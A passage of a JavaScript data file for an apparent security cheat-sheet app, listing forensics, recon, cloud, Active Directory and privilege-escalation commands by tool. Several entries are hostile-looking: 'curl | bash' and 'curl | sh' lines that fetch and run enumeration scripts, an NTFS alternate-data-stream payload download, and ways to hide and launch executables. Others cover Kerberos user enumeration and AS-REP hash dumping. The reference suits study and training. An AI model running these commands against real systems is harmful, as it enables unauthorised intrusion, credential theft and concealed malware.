      { title: 'wireshark — Export HTTP objects', desc: 'Extract files from HTTP stream (GUI: File -> Export Objects -> HTTP)', diff: 'hard', code: 'File -> Export Objects -> HTTP' },
    ]
  },
  {
    id: 'gdb',
    emoji: '\u{1F9EC}',
    title: 'Malware Investigation — GDB (GNU Debugger)',
    commands: [
      { title: 'gdb — Start binary', desc: 'Launch GDB with program', diff: 'hard', code: 'gdb <binary>' },
      { title: 'gdb — Quiet start', desc: 'Launch without banner', diff: 'hard', code: 'gdb -q <binary>' },
      { title: 'gdb — Attach to PID', desc: 'Debug running process', diff: 'hard', code: 'gdb -p <pid>' },
      { title: 'gdb — Attach inside', desc: 'Attach to process from GDB prompt', diff: 'hard', code: 'attach <pid>' },
      { title: 'gdb — Detach', desc: 'Detach from debugged process', diff: 'hard', code: 'detach' },
      { title: 'gdb — Run', desc: 'Start program execution', diff: 'medium', code: 'run' },
      { title: 'gdb — Run with args', desc: 'Start with command-line arguments', diff: 'medium', code: 'run <arg1> <arg2>' },
      { title: 'gdb — Continue', desc: 'Resume paused execution', diff: 'medium', code: 'continue' },
      { title: 'gdb — Step into', desc: 'Execute next instruction (enter function)', diff: 'hard', code: 'step' },
      { title: 'gdb — Step over', desc: 'Execute next instruction (skip function)', diff: 'hard', code: 'next' },
      { title: 'gdb — Finish function', desc: 'Run until current function returns', diff: 'hard', code: 'finish' },
      { title: 'gdb — Break at function', desc: 'Set breakpoint at function entry', diff: 'medium', code: 'break <function>' },
      { title: 'gdb — Break at address', desc: 'Set breakpoint at memory address', diff: 'hard', code: 'break *<address>' },
      { title: 'gdb — List breakpoints', desc: 'Show all breakpoints', diff: 'medium', code: 'info breakpoints' },
      { title: 'gdb — Delete breakpoint', desc: 'Remove breakpoint by number', diff: 'medium', code: 'delete <num>' },
      { title: 'gdb — Disable breakpoint', desc: 'Temporarily disable breakpoint', diff: 'medium', code: 'disable <num>' },
      { title: 'gdb — Enable breakpoint', desc: 'Re-enable disabled breakpoint', diff: 'medium', code: 'enable <num>' },
      { title: 'gdb — Show registers', desc: 'Display CPU register values', diff: 'hard', code: 'info registers' },
      { title: 'gdb — Disassemble function', desc: 'Show assembly instructions', diff: 'hard', code: 'disassemble <function>' },
      { title: 'gdb — Show source', desc: 'Display source code around current line', diff: 'medium', code: 'list' },
      { title: 'gdb — List functions', desc: 'Show all known function names', diff: 'medium', code: 'info functions' },
      { title: 'gdb — Examine instructions', desc: 'Inspect N instructions at RIP', diff: 'hard', code: 'x/<count>i $rip' },
      { title: 'gdb — Examine stack hex', desc: 'View stack memory in hex', diff: 'hard', code: 'x/<count>x $rsp' },
      { title: 'gdb — Print string', desc: 'Dump string at address', diff: 'hard', code: 'x/s <address>' },
      { title: 'gdb — Instruction dump at addr', desc: 'Disassemble at specific address', diff: 'hard', code: 'x/<count>i <address>' },
      { title: 'gdb — Backtrace', desc: 'Show call stack trace', diff: 'hard', code: 'bt' },
      { title: 'gdb — Switch frame', desc: 'Navigate to specific stack frame', diff: 'hard', code: 'frame <num>' },
      { title: 'gdb — Frame details', desc: 'Show current stack frame info', diff: 'hard', code: 'info frame' },
      { title: 'gdb — Function arguments', desc: 'Show args passed to current function', diff: 'hard', code: 'info args' },
      { title: 'gdb — Local variables', desc: 'Show local variable values', diff: 'hard', code: 'info locals' },
      { title: 'gdb — Print variable', desc: 'Display value of variable', diff: 'medium', code: 'print <variable>' },
      { title: 'gdb — Modify variable', desc: 'Change variable value', diff: 'hard', code: 'set <variable>=<value>' },
      { title: 'gdb — Auto-print variable', desc: 'Display variable after every step', diff: 'hard', code: 'display <variable>' },
      { title: 'gdb — Print register', desc: 'Display register value', diff: 'hard', code: 'print $<register>' },
      { title: 'gdb — Modify register', desc: 'Change register value', diff: 'hard', code: 'set $<register>=<value>' },
      { title: 'gdb — Disable paging', desc: 'Stop GDB from pausing output', diff: 'medium', code: 'set pagination off' },
      { title: 'gdb — Intel syntax', desc: 'Switch to Intel disassembly style', diff: 'medium', code: 'set disassembly-flavor intel' },
      { title: 'gdb — Stop program', desc: 'Kill the running process', diff: 'medium', code: 'kill' },
      { title: 'gdb — TUI mode', desc: 'Toggle text user interface', diff: 'medium', code: 'Ctrl+X+A' },
    ]
  },
  {
    id: 'file-hash',
    emoji: '\u{1F4CB}',
    title: 'Windows — Get-FileHash',
    commands: [
      { title: 'Get-FileHash — Default (SHA256)', desc: 'Generate SHA256 hash of a file', diff: 'easy', code: 'Get-FileHash <file>' },
      { title: 'Get-FileHash — Specify algorithm', desc: 'MD5, SHA1, SHA256, SHA384, SHA512', diff: 'easy', code: 'Get-FileHash <file> -Algorithm <algorithm>' },
      { title: 'Get-FileHash — SHA256 explicit', desc: 'Explicitly request SHA256', diff: 'easy', code: 'Get-FileHash <file> -Algorithm SHA256' },
      { title: 'Get-FileHash — Full path', desc: 'Hash file using absolute path', diff: 'easy', code: 'Get-FileHash "<path>"' },
      { title: 'Get-FileHash — Store in variable', desc: 'Save hash result for later use', diff: 'medium', code: '$hash = Get-FileHash <file>' },
      { title: 'Get-FileHash — Hash value only', desc: 'Return just the hash string', diff: 'medium', code: '(Get-FileHash <file>).Hash' },
      { title: 'Get-FileHash — Compare two files', desc: 'Check if files are identical', diff: 'medium', code: 'Compare-Object (Get-FileHash <file1>) (Get-FileHash <file2>)' },
      { title: 'Get-FileHash — Export to file', desc: 'Write hash output to text file', diff: 'medium', code: 'Get-FileHash <file> | Out-File <output>' },
      { title: 'Get-FileHash — Hash multiple files', desc: 'Hash all matching files', diff: 'hard', code: 'Get-ChildItem *.<ext> | Get-FileHash' },
      { title: 'Get-FileHash — Hash recursively', desc: 'Hash all files in directory tree', diff: 'hard', code: 'Get-ChildItem -Recurse | Get-FileHash' },
    ]
  },
  {
    id: 'strings-cmd',
    emoji: '\u{1F4DC}',
    title: 'Forensics — strings',
    commands: [
      { title: 'strings — Basic extraction', desc: 'Extract printable ASCII strings', diff: 'easy', code: 'strings <file>' },
      { title: 'strings — Min length', desc: 'Show strings of N chars or more', diff: 'easy', code: 'strings -n <length> <file>' },
      { title: 'strings — Scan entire file', desc: 'Scan whole file (not just initialized data)', diff: 'medium', code: 'strings -a <file>' },
      { title: 'strings — UTF-16 LE', desc: 'Extract little-endian Unicode strings', diff: 'medium', code: 'strings -e l <file>' },
      { title: 'strings — UTF-16 BE', desc: 'Extract big-endian Unicode strings', diff: 'medium', code: 'strings -e b <file>' },
      { title: 'strings — Display offsets', desc: 'Show hex offsets before each string', diff: 'medium', code: 'strings -t x <file>' },
      { title: 'strings — Search keyword', desc: 'Extract then grep for pattern', diff: 'medium', code: 'strings <file> | grep <keyword>' },
      { title: 'strings — Extract URLs', desc: 'Find embedded HTTP links', diff: 'hard', code: 'strings <file> | grep http' },
      { title: 'strings — Extract IPs', desc: 'Find embedded IP addresses', diff: 'hard', code: 'strings <file> | grep -E \'([0-9]{1,3}\\.){3}[0-9]{1,3}\'' },
      { title: 'strings — Recursive directory', desc: 'Run strings on all files in dir', diff: 'hard', code: 'find <dir> -type f -exec strings {} \\;' },
      { title: 'strings — Save to file', desc: 'Write extracted strings to output', diff: 'easy', code: 'strings <file> > <output>' },
    ]
  },
  {
    id: 'regshot',
    emoji: '\u{1F4F9}',
    title: 'Windows — Regshot (Registry Diff)',
    commands: [
      { title: 'regshot — Snapshot 1 (GUI)', desc: 'Take baseline registry snapshot', diff: 'medium', code: 'Regshot -> "1st shot"' },
      { title: 'regshot — Snapshot 2 (GUI)', desc: 'Take post-change snapshot', diff: 'medium', code: 'Regshot -> "2nd shot"' },
      { title: 'regshot — Compare (GUI)', desc: 'Generate comparison report', diff: 'medium', code: 'Regshot -> "Compare"' },
      { title: 'regshot — Export TXT', desc: 'Save diff report as plain text', diff: 'medium', code: 'Regshot -> "Save as..." -> TXT' },
      { title: 'regshot — Export HTML', desc: 'Save diff report as HTML', diff: 'medium', code: 'Regshot -> "Save as..." -> HTML' },
      { title: 'regshot — CLI snapshot 1', desc: 'Baseline via command line', diff: 'hard', code: 'regshot.exe /1' },
      { title: 'regshot — CLI snapshot 2', desc: 'Second snapshot via CLI', diff: 'hard', code: 'regshot.exe /2' },
      { title: 'regshot — CLI compare', desc: 'Generate diff from CLI', diff: 'hard', code: 'regshot.exe /compare' },
      { title: 'regshot — Check Run keys', desc: 'Review auto-start registry entries', diff: 'medium', code: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' },
      { title: 'regshot — Check Services', desc: 'Check for hidden service persistence', diff: 'hard', code: 'HKLM\\SYSTEM\\CurrentControlSet\\Services' },
      { title: 'regshot — Check Winlogon', desc: 'Review login/restriction policy changes', diff: 'hard', code: 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' },
    ]
  },
  {
    id: 'procmon',
    emoji: '\u{1F4FA}',
    title: 'Windows — Procmon (Process Monitor)',
    commands: [
      { title: 'procmon — Toggle capture', desc: 'Start/stop event capture', diff: 'medium', code: 'Ctrl+E' },
      { title: 'procmon — Clear events', desc: 'Remove all captured events', diff: 'medium', code: 'Ctrl+X' },
      { title: 'procmon — Save log', desc: 'Export to PML or CSV', diff: 'medium', code: 'Ctrl+S' },
      { title: 'procmon — Filter dialog', desc: 'Add include/exclude rules', diff: 'hard', code: 'Ctrl+L' },
      { title: 'procmon — Highlight rules', desc: 'Color specific events by rule', diff: 'hard', code: 'Ctrl+H' },
      { title: 'procmon — Process tree', desc: 'View parent-child process hierarchy', diff: 'medium', code: 'Ctrl+T' },
      { title: 'procmon — Jump to event', desc: 'Navigate to specific PID or event', diff: 'medium', code: 'Ctrl+J' },
      { title: 'procmon — Filter: CreateFile', desc: 'Track file create/open operations', diff: 'hard', code: 'Operation is CreateFile' },
      { title: 'procmon — Filter: WriteFile', desc: 'Monitor file write operations', diff: 'hard', code: 'Operation is WriteFile' },
      { title: 'procmon — Filter: RegSetValue', desc: 'Detect registry value modifications', diff: 'hard', code: 'Operation is RegSetValue' },
      { title: 'procmon — Filter: Process Create', desc: 'Capture new process execution', diff: 'hard', code: 'Operation is Process Create' },
      { title: 'procmon — Filter: Load Image', desc: 'Monitor DLL/image loading', diff: 'hard', code: 'Operation is Load Image' },
      { title: 'procmon — Filter: TCP Connect', desc: 'Detect network connections', diff: 'hard', code: 'Operation is TCP Connect' },
      { title: 'procmon — Filter by path', desc: 'Filter events by file path pattern', diff: 'hard', code: 'Path contains <value>' },
      { title: 'procmon — Filter by result', desc: 'Filter by SUCCESS, DENIED, etc.', diff: 'hard', code: 'Result is <value>' },
      { title: 'procmon — Filter by PID', desc: 'Isolate events for a process', diff: 'medium', code: 'PID is <pid>' },
      { title: 'procmon — Filter by process', desc: 'Focus on specific executable', diff: 'medium', code: 'Process Name is <process_name>' },
    ]
  },
  {
    id: 'hayabusa',
    emoji: '\u{1F50D}',
    title: 'Windows — Hayabusa (Event Log Forensics)',
    commands: [
      { title: 'hayabusa — Show help', desc: 'Display available command options', diff: 'easy', code: '.\\hayabusa.exe csv-timeline -h' },
      { title: 'hayabusa — CSV timeline', desc: 'Run threat detection rules on EVTX directory', diff: 'hard', code: '.\\hayabusa.exe csv-timeline --directory <evtx_dir> -o <output>.csv --no-color' },
      { title: 'hayabusa — View results', desc: 'Display CSV output in PowerShell', diff: 'medium', code: 'Get-Content .\\<output>.csv -Encoding UTF8' },
      { title: 'hayabusa — Open in Timeline Explorer', desc: 'Analyze CSV with Timeline Explorer GUI', diff: 'medium', code: 'Open .csv in Timeline Explorer -> Group by Level, then Rule Title' },
      { title: 'hayabusa — Sysmon rules', desc: 'Include Sysmon detection rules', diff: 'hard', code: 'Include sysmon rules? (3,685 rules) -> yes' },
    ]
  },
  {
    id: 'eyewitness',
    emoji: '\u{1F4F7}',
    title: 'Recon — EyeWitness (Web Screenshots)',
    commands: [
      { title: 'eyewitness — Scan URL list', desc: 'Screenshot all URLs from file', diff: 'easy', code: 'eyewitness -f <url_file> -d <output> --web' },
      { title: 'eyewitness — Single target', desc: 'Screenshot one website', diff: 'easy', code: 'eyewitness --single <url> -d <output>' },
      { title: 'eyewitness — From Nmap XML', desc: 'Screenshot targets from Nmap scan', diff: 'medium', code: 'eyewitness -x <nmap_xml> -d <output> --web' },
      { title: 'eyewitness — Resume scan', desc: 'Continue interrupted session', diff: 'medium', code: 'eyewitness --resume <database>.db' },
      { title: 'eyewitness — Faster threads', desc: 'Speed up with parallel threads', diff: 'medium', code: 'eyewitness -f <url_file> -d <output> --threads <count>' },
      { title: 'eyewitness — Slow/stealth', desc: 'Add delay between requests', diff: 'medium', code: 'eyewitness -f <url_file> -d <output> --delay <seconds>' },
      { title: 'eyewitness — Timeout', desc: 'Prevent hanging on slow sites', diff: 'medium', code: 'eyewitness -f <url_file> -d <output> --timeout <seconds>' },
      { title: 'eyewitness — Use proxy', desc: 'Route through Burp/SOCKS proxy', diff: 'hard', code: 'eyewitness -f <url_file> -d <output> --proxy-ip <ip> --proxy-port <port> --proxy-type socks5' },
      { title: 'eyewitness — Custom User-Agent', desc: 'Spoof browser identity', diff: 'medium', code: 'eyewitness -f <url_file> -d <output> --user-agent "<ua>"' },
      { title: 'eyewitness — Non-interactive', desc: 'Run without prompts', diff: 'easy', code: 'eyewitness -f <url_file> -d <output> --no-prompt' },
    ]
  },
  {
    id: 'bucket-finder',
    emoji: '\u{26F3}',
    title: 'Cloud — S3 Bucket Finder',
    commands: [
      { title: 'bucket_finder — Single bucket', desc: 'Check if bucket exists and is public', diff: 'easy', code: 'bucket_finder.py -b <bucket>' },
      { title: 'bucket_finder — Scan list', desc: 'Test multiple bucket names from file', diff: 'easy', code: 'bucket_finder.py -l <bucket_file>' },
      { title: 'bucket_finder — Verbose', desc: 'Show detailed HTTP responses', diff: 'medium', code: 'bucket_finder.py -b <bucket> -v' },
      { title: 'bucket_finder — Wordlist enum', desc: 'Enumerate buckets from wordlist', diff: 'medium', code: 'bucket_finder.py -w <wordlist>' },
      { title: 'bucket_finder — Region', desc: 'Check bucket in specific AWS region', diff: 'medium', code: 'bucket_finder.py -b <bucket> --region <region>' },
      { title: 'bucket_finder — Save results', desc: 'Write scan results to file', diff: 'easy', code: 'bucket_finder.py -l <bucket_file> -o <output>' },
      { title: 'bucket_finder — Concurrent', desc: 'Multi-threaded scanning', diff: 'medium', code: 'bucket_finder.py -l <bucket_file> -t <threads>' },
    ]
  },
  {
    id: 'blob-finder',
    emoji: '\u{2601}\u{FE0F}',
    title: 'Cloud — Azure Blob Finder',
    commands: [
      { title: 'blobfinder — Basic scan', desc: 'Find Azure blobs linked to domain', diff: 'easy', code: 'blobfinder -d <domain>' },
      { title: 'blobfinder — Enumerate containers', desc: 'List public blob containers', diff: 'medium', code: 'blobfinder -s <storage_url>' },
      { title: 'blobfinder — List files', desc: 'Show files in public containers', diff: 'medium', code: 'blobfinder -s <storage_url> -l' },
      { title: 'blobfinder — Recursive', desc: 'Recursively enumerate blobs', diff: 'hard', code: 'blobfinder -s <storage_url> -r' },
      { title: 'blobfinder — Save output', desc: 'Write results to file', diff: 'easy', code: 'blobfinder -d <domain> -o <output>' },
      { title: 'blobfinder — Verbose', desc: 'Detailed enumeration output', diff: 'medium', code: 'blobfinder -d <domain> -v' },
      { title: 'blobfinder — Wordlist', desc: 'Custom wordlist for discovery', diff: 'medium', code: 'blobfinder -d <domain> -w <wordlist>' },
      { title: 'blobfinder — Specific container', desc: 'Enumerate files from named container', diff: 'hard', code: 'blobfinder -s <storage_url> -c <container>' },
      { title: 'blobfinder — Check anonymous', desc: 'Verify anonymous access enabled', diff: 'medium', code: 'blobfinder -s <storage_url> --check' },
      { title: 'blobfinder — JSON output', desc: 'Export results as JSON', diff: 'medium', code: 'blobfinder -d <domain> --json' },
      { title: 'blobfinder — Help', desc: 'Show available options', diff: 'easy', code: 'blobfinder -h' },
    ]
  },
  {
    id: 'dns-ref',
    emoji: '\u{1F310}',
    title: 'DNS Protocol Reference',
    commands: [
      { title: 'DNS — UDP 53', desc: 'Default query port (fast, lightweight)', diff: 'easy', code: 'UDP 53' },
      { title: 'DNS — TCP 53', desc: 'Zone transfers and large responses', diff: 'medium', code: 'TCP 53' },
      { title: 'Record — A', desc: 'IPv4 address mapping', diff: 'easy', code: 'A: domain -> IPv4' },
      { title: 'Record — AAAA', desc: 'IPv6 address mapping', diff: 'easy', code: 'AAAA: domain -> IPv6' },
      { title: 'Record — CNAME', desc: 'Alias to canonical name', diff: 'easy', code: 'CNAME: alias -> real domain' },
      { title: 'Record — MX', desc: 'Mail exchange server', diff: 'easy', code: 'MX: priority -> mail server' },
      { title: 'Record — TXT', desc: 'Arbitrary text (SPF, DKIM, verify)', diff: 'easy', code: 'TXT: "v=spf1 ..."' },
      { title: 'Record — NS', desc: 'Authoritative name server', diff: 'easy', code: 'NS: ns1.example.com' },
      { title: 'Record — SOA', desc: 'Zone authority (serial, refresh)', diff: 'medium', code: 'SOA: primary NS + admin email' },
      { title: 'Record — PTR', desc: 'Reverse DNS (IP -> name)', diff: 'medium', code: 'PTR: IP -> domain' },
      { title: 'Record — SRV', desc: 'Service discovery (SIP, LDAP)', diff: 'medium', code: 'SRV: priority weight port target' },
      { title: 'dig — A record', desc: 'Query IPv4 address', diff: 'easy', code: 'dig A <domain>' },
      { title: 'dig — ANY record', desc: 'All record types (often filtered)', diff: 'medium', code: 'dig ANY <domain>' },
      { title: 'dig — Trace', desc: 'Full resolution path from root', diff: 'hard', code: 'dig +trace <domain>' },
      { title: 'dig — MX record', desc: 'Mail server lookup', diff: 'easy', code: 'dig MX <domain>' },
      { title: 'dig — TXT record', desc: 'SPF / DKIM / verification', diff: 'easy', code: 'dig TXT <domain>' },
      { title: 'dig — NS record', desc: 'Authoritative name servers', diff: 'easy', code: 'dig NS <domain>' },
      { title: 'nslookup — Basic', desc: 'Simple DNS resolution', diff: 'easy', code: 'nslookup <domain>' },
      { title: 'nslookup — Reverse', desc: 'PTR lookup for IP', diff: 'medium', code: 'nslookup <ip>' },
      { title: 'host — Basic', desc: 'Quick domain lookup', diff: 'easy', code: 'host <domain>' },
      { title: 'whois', desc: 'Domain registration info', diff: 'easy', code: 'whois <domain>' },
    ]
  },
  {
    id: 'forensics',
    emoji: '\u{1F52C}',
    title: 'Forensics',
    commands: [
      { title: 'autopsy', desc: 'GUI forensic browser', diff: 'medium', code: 'autopsy' },
      { title: 'volatility — Image info', desc: 'Get memory dump profile', diff: 'hard', code: 'volatility -f memory.dump imageinfo' },
      { title: 'volatility — Processes', desc: 'List running processes from dump', diff: 'hard', code: 'volatility -f memory.dump --profile=<profile> pslist' },
      { title: 'foremost', desc: 'Recover files by headers/footers', diff: 'medium', code: 'foremost -i disk.img -o output/' },
      { title: 'bulk_extractor', desc: 'Carve emails, credit cards from images', diff: 'easy', code: 'bulk_extractor -o output/ image.dd' },
      { title: 'exiftool', desc: 'Read file metadata', diff: 'easy', code: 'exiftool <file>' },
    ]
  },
  {
    id: 'cloud',
    emoji: '\u{2601}\u{FE0F}',
    title: 'Cloud & Active Directory',
    commands: [
      { title: 'aws — S3 ls', desc: 'List S3 buckets accessible', diff: 'easy', code: 'aws s3 ls --no-sign-request' },
      { title: 'aws — List bucket contents', desc: 'Enumerate S3 bucket objects', diff: 'easy', code: 'aws s3 ls s3://<bucket> --no-sign-request --recursive' },
      { title: 's3scanner', desc: 'Find open S3 buckets', diff: 'medium', code: 's3scanner --bucket <bucket>' },
      { title: 'BloodHound', desc: 'AD privilege escalation path analysis', diff: 'hard', code: [
        '# Collect data on DC:',
        'bloodhound-python -d <domain> -u <user> -p <pass> -c All -ns <dc_ip>',
        '# Then load the JSON files into BloodHound GUI',
      ]},
      { title: 'kerbrute', desc: 'Kerberos user enumeration', diff: 'medium', code: 'kerbrute userenum -d <domain> <userlist> --dc <dc_ip>' },
      { title: 'GetNPUsers — AS-REP roast', desc: 'Find users without Kerberos pre-auth', diff: 'hard', code: 'impacket-GetNPUsers <domain>/<user>:<pass> -outputfile hashes.txt' },
    ]
  },
  {
    id: 'privesc',
    emoji: '\u{2B06}',
    title: 'Privilege Escalation',
    commands: [
      { title: 'sudo -l', desc: 'List sudo privileges', diff: 'easy', code: 'sudo -l' },
      { title: 'SUID files', desc: 'Find setuid binaries', diff: 'easy', code: 'find / -perm -4000 -type f 2>/dev/null' },
      { title: 'writable scripts in PATH', desc: 'Hijack a script executed by root', diff: 'medium', code: 'find / -writable -type f 2>/dev/null | xargs ls -la' },
      { title: 'cron jobs', desc: 'List scheduled tasks', diff: 'medium', code: [
        'ls -la /etc/cron*',
        'cat /etc/crontab',
        'cat /var/spool/cron/crontabs/<user>',
      ]},
      { title: 'kernel exploit (LES)', desc: 'Linux Exploit Suggester', diff: 'hard', code: 'curl -s https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash' },
      { title: 'Windows — Service permissions', desc: 'Check for weak service ACLs', diff: 'hard', code: [
        'accesschk.exe -uwcqv <user> *',
        '# or with PowerShell:',
        'Get-Service | Where { $_.CanStopAndUninstall }',
      ]},
    ]
  },
  {
    id: 'windows',
    emoji: '\u{1F4BB}',
    title: 'Windows — Alternate Data Streams',
    commands: [
      { title: 'ADS — Create (cmd)', desc: 'Hide data in NTFS stream', diff: 'medium', code: 'echo <secret> > <file>:<stream>' },
      { title: 'ADS — Create (PowerShell)', desc: 'Create stream with PowerShell', diff: 'medium', code: 'Set-Content <file> -Stream <stream> -Value "<secret>"' },
      { title: 'ADS — Read (cmd)', desc: 'Display stream contents via more', diff: 'medium', code: 'more < <file>:<stream>' },

      { title: 'ADS — Read (PowerShell)', desc: 'Read stream with PowerShell', diff: 'medium', code: 'Get-Content <file> -Stream <stream>' },
      { title: 'ADS — List (dir)', desc: 'Show all streams on files', diff: 'easy', code: 'dir /r' },
      { title: 'ADS — List (PowerShell)', desc: 'Enumerate streams on file', diff: 'medium', code: 'Get-Item <file> -Stream *' },
      { title: 'ADS — Recursive hunt', desc: 'Find all streams in directory tree', diff: 'hard', code: 'Get-ChildItem -Recurse | ForEach-Object { Get-Item $_.FullName -Stream * }' },
      { title: 'ADS — Execute (PowerShell)', desc: 'Run executable from stream', diff: 'hard', code: 'Invoke-Item <file>:<stream>.exe' },
      { title: 'ADS — Execute (wmic)', desc: 'Launch stream via WMIC', diff: 'hard', code: 'wmic process call create "C:\\<path>\\<file>:<stream>.exe"' },
      { title: 'ADS — Download payload', desc: 'Store web download in ADS', diff: 'hard', code: 'Invoke-WebRequest -Uri <url> -OutFile <file>:<stream>.exe' },
      { title: 'ADS — Store executable', desc: 'Hide EXE inside text file', diff: 'hard', code: 'type <payload>.exe > <file>.txt:<payload>.exe' },
      { title: 'ADS — Hash stream', desc: 'Get hash of ADS content', diff: 'medium', code: 'Get-FileHash <file> -Stream <stream>' },
      { title: 'ADS — Delete (PowerShell)', desc: 'Remove specific stream', diff: 'medium', code: 'Remove-Item <file> -Stream <stream>' },
      { title: 'ADS — Scan (Sysinternals)', desc: 'Enumerate streams recursively', diff: 'medium', code: 'streams.exe -s <directory>' },
      { title: 'ADS — Delete (Sysinternals)', desc: 'Remove streams from file', diff: 'medium', code: 'streams.exe -d <file>' },
    ]
  },
  {
    id: 'crypto',
    emoji: '\u{1F510}',
    title: 'Cryptography & Encoding',
    commands: [
      { title: 'openssl — Generate RSA key pair', desc: '2048-bit private/public', diff: null, code: [
        'openssl genrsa -out private.pem 2048',
        'openssl rsa -in private.pem -pubout > public.pem',
      ]},
      { title: 'openssl — Self-signed cert', desc: 'For HTTPS testing', diff: null, code: 'openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes' },
      { title: 'Base64 — Encode/Decode', desc: 'Shell one-liners', diff: null, code: [
        'echo -n "<text>" | base64    # encode',
        'echo "<base64>" | base64 -d  # decode',
      ]},
      { title: 'xxd — Hex dump / unhex', desc: 'Binary to hex and back', diff: null, code: [
        'xxd <file>              # hex dump',
        'xxd -r -p <hex.txt>     # hex to binary',
      ]},
    ]
  },
  {
    id: 'misc',
    emoji: '\u{1F9F0}',
    title: 'Misc Utilities',
    commands: [
      { title: 'linpeas — Linux privesc', desc: 'Auto-enumeration script for Linux', diff: null, code: 'curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh' },
      { title: 'winpeas — Windows privesc', desc: 'Auto-enumeration for Windows', diff: null, code: [
        'curl -L -o winpeas.exe https://github.com/peass-ng/PEASS-ng/releases/latest/download/winpeasx64.exe',
        '.\\winpeas.exe',
      ]},
      { title: 'steghide', desc: 'Extract hidden data from image', diff: null, code: 'steghide extract -sf image.jpg' },
      { title: 'binwalk', desc: 'Extract files from firmware/binaries', diff: null, code: 'binwalk --dd=".*" firmware.bin' },
      { title: 'strings', desc: 'Extract readable text from binary', diff: null, code: 'strings <file> | grep -i "flag\\|password\\|secret"' },
    ]
  },
];
